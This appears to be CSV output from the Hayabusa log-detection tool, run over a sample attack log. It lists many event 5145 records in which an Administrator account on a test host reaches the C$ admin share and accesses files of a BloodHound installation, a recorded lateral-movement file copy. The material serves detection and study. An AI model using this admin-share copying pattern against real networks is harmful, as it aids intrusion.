Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
